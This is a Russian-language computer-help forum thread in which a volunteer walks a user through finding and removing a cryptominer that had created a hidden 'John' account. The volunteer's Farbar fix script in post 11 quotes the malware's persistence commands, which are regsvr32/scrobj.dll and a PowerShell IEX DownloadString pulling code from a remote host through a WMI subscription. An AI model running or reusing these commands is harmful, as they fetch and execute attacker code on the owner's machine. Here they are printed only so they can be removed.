0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
1

Вероятный майнер по имени John

28.12.2021, 22:56. Показов 18832. Ответов 17
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
Как вы могли догадаться из названия я совершенно случайно обнаружил ещё одного скрытого пользователя своей системы:

Имя устройства LAPTOP-SR6R18LC
Процессор Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz 2.11 GHz
Оперативная память 8,00 ГБ (доступно: 7,84 ГБ)
Тип системы 64-разрядная операционная система, процессор x64
Выпуск Windows 10 Домашняя для одного языка
Версия 20H2
Дата установки ‎07.‎08.‎2021
Сборка ОС 19042.1415
Взаимодействие Windows Feature Experience Pack 120.2212.3920.0

По имени John который обладал правами удалённого доступа. Не долго думая ,удалив его через Выполнить , решил убедиться в своих подозрениях и попал на ваш сайт где описан похожий случай. Решил последовать вашим инструкциям и создать тему по этому поводу. К слову вирус никак себя не выдаёт, процессы не висят. Единственное что при попытке зайти на ваш сайт через браузер Edge - браузер вылетал, уж не знаю связанно это или нет. Сейчас сижу через яндекс. В общем логи приложил. Дайте знать что это и что с этим делать. Я право не в силах бороться на равных с этой электроникой.
Вложения
Тип файла: zip CollectionLog-2021.12.28-22.31.zip (72.3 Кб, 36 просмотров)
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
28.12.2021, 22:56
Ответы с готовыми решениями:

Майнер по имени John взломал мой компьютер и я не могу скачать антивирусы
Сегодня я, как обычно, включил компьютер и начал работать. Вдруг замечаю, что компьютер медленно...

Подскажите вероятный листинг диаграммы
У кого есть возможность, напишите пожалуйста листинг для такой структуры. Хотя бы приблизительный...

Программа, которая позволит ставить вероятный диагноз
Привет, парни, участвую в конкурсе по информатике, пишу программу, которая позволит ставить...

Найти наиболее вероятный прямоугольник среди множества точек
Всем привет. Застрял на такой задаче: Есть декартовы координаты, на них определено n>=4 точек....

17
Вирусоборец
13265 / 7389 / 1564
Регистрация: 06.09.2009
Сообщений: 26,953
28.12.2021, 23:28 2
Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe
В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 00:26  [ТС] 3
Я вынужден извиниться, ведь выполнить подобные манипуляции не представляется возможным. Даже при переименовании программа не ставится. Система говорит что там вирус или вредоносная программа и удаляет его.
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 00:50  [ТС] 4
-->
Миниатюры
Вероятный майнер по имени John   Вероятный майнер по имени John  
0
Вирусоборец
13265 / 7389 / 1564
Регистрация: 06.09.2009
Сообщений: 26,953
29.12.2021, 01:22 5
Нет там вируса. Отключите параноидального Защитника Windows хотя бы на время лечения.
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 01:49  [ТС] 6
Мой косяк. На 10 винде столько служб по защите появилось что черт ногу сломит , а защиты всё равно ноль.
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 01:51  [ТС] 7
-->
Вложения
Тип файла: zip CollectionLog-2021.12.29-01.48.zip (65.2 Кб, 7 просмотров)
Тип файла: log AV_block_remove_2021.12.29-01.43.log (5.0 Кб, 20 просмотров)
0
Вирусоборец
13265 / 7389 / 1564
Регистрация: 06.09.2009
Сообщений: 26,953
29.12.2021, 01:54 8
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.
  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 02:04  [ТС] 9
Готово
Вложения
Тип файла: rar Архив.rar (21.2 Кб, 22 просмотров)
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 02:32  [ТС] 10
Ну по ощущениям уже что то изменилось. Раньше шумел вентиляторами как вертолёт , а щас вдруг притих. Я думал так и должно быть) Ан нет. Видно что то с торрентов подцепил ещё пару месяцев назад. Ну что за погань....нет чтобы честным пиратством заниматься.)

Добавлено через 11 минут
Сестре купили ноут. Решил потестить немного. Ну всё как обычно в общем.)
0
Вирусоборец
13265 / 7389 / 1564
Регистрация: 06.09.2009
Сообщений: 26,953
29.12.2021, 07:09 11
1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)
Код
Start::
CreateRestorePoint:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ha7455h6fi1.net:280/v1.sct scrobj.dll (Нет файла) <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
WMI:subscription\CommandLineEventConsumer->topk4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.ha7455h6fi1.net:8080/power.txt')||regsvr32 /u /s /i:http://ha7455h6fi1.net:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://wmi.ha7455h6fi1.net:8220/s.xsl"]
Reboot:
End::
2. Запустите Farbar Recovery Scan Tool от имени Алминистратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
  • Обратите внимание: будет выполнена перезагрузка компьютера.
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 14:25  [ТС] 12
Готово
Вложения
Тип файла: txt Fixlog.txt (1.7 Кб, 9 просмотров)
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 14:52  [ТС] 13
Откуда пришла эта зараза можно выяснить? И посоветуете антивирус какой?
0
Вирусоборец
13265 / 7389 / 1564
Регистрация: 06.09.2009
Сообщений: 26,953
29.12.2021, 19:53 14
Цитата Сообщение от Aexd Посмотреть сообщение
Откуда пришла эта зараза можно выяснить?
Не представляется возможным, но наверняка с каким-нибудь кряком, кейгеном и т.п.

Проблема решена?

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
  • Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
  • Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
  • Прикрепите этот файл в своем следующем сообщении.
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 20:10  [ТС] 15
Проблема решена?
Да, в общем да. Больше не греется и не шумит как последние пару месяцев. Ну можно сказать поработал в стресс режиме. Ничего не сгорело и не отвалилось.Тест прошёл успешно)
Вложения
Тип файла: txt SecurityCheck.txt (8.5 Кб, 11 просмотров)
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
29.12.2021, 20:24  [ТС] 16
Если на этом всё, то хочу от души поблагодарить за вашу оперативную подмогу и знания. Респект администрации сайта и подобным ресурсам за вклад в борьбу со злым умыслом и спасения каждого из людей встретившего проблемы в этой сфере в частности и всего мира в общности.
0
Вирусоборец
13265 / 7389 / 1564
Регистрация: 06.09.2009
Сообщений: 26,953
29.12.2021, 22:58 17
------------------------------- [ Browser ] -------------------------------
Opera Stable 82.0.4227.23 v.82.0.4227.23 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
Opera 11.00 v.11.00.1156 Внимание! Скачать обновления
Yandex (All Users) v.21.11.4.727 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
---------------------------- [ UnwantedApps ] -----------------------------
Кнопка "Яндекс" на панели задач v.2.2.1.54 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Driver Easy 5.7.0.39448 v.5.7.0.39448 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.
Исправляйте указанное + Рекомендации после удаления вредоносного ПО
0
0 / 0 / 0
Регистрация: 28.12.2021
Сообщений: 12
30.12.2021, 01:26  [ТС] 18
Спасибо вам.. Всех благ и всего самого наилучшего в новом году. С наступающим.
0
30.12.2021, 01:26
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
30.12.2021, 01:26
Помогаю со студенческими работами здесь

Вирус пользователь john
Помогите пожалуйста надо удалить вирус Майнер . Заметил его когда оперативная память начала...

Скрытый пользователь John
Что делать на компьюетере появился скрытый пользователь. обнаружил я через программу AVBR....

На ПК появился скрытый пользователь John
Все началось с того, что падал фпс до 5-8 в играх, если не трогаешь мышь или клавиатуру в течение...

Система перестала загружаться появился пользователь john
Здравствуйте. У меня на ПК несколько ОС. На днях Windows 7 перестала загружаться. Черный экран и...

Папка с неизвестным пользователем John и вирус шифровальщик
Около 5 дней наблюдаю такую ситуацию,что у файлом появляется странное расширение(.secure),в случае...

Поймал майнера, появился новый пользователь John
Поймал майнера, судя по прочитанным статьям. Из необычного появился новый пользователь John....

Задача "John, Bruce and beer"
Вот мой код. Задача проходит на 97%. Подскажите в чем моя ошибкаvar f1,f2:text; a,b,c:real; ...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
18
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru